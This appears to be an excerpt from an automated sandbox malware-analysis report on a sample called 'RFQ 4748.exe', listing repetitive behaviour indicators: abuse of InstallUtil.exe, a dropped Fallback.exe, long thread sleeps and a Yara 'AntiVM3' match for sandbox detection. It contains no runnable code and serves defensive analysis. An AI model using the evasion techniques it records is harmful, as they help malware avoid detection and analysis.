                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598451Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597135Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597017Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596866Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594679Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597949Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597599Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595208Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeWindow / User API: threadDelayed 7883Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeWindow / User API: threadDelayed 1922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2540Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7315Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeWindow / User API: threadDelayed 2563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeWindow / User API: threadDelayed 5950Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7146Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6976Thread sleep count: 7883 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6976Thread sleep count: 1922 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99874s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -99098s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98627s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98382s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -98029s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -97094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -96094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95306s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -95078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -94969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -94844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764Thread sleep time: -94734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6536Thread sleep count: 2540 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6536Thread sleep count: 7315 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599546s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598451s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597135s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -597017s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596866s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436Thread sleep time: -595781s >= -30000sJump to behavior
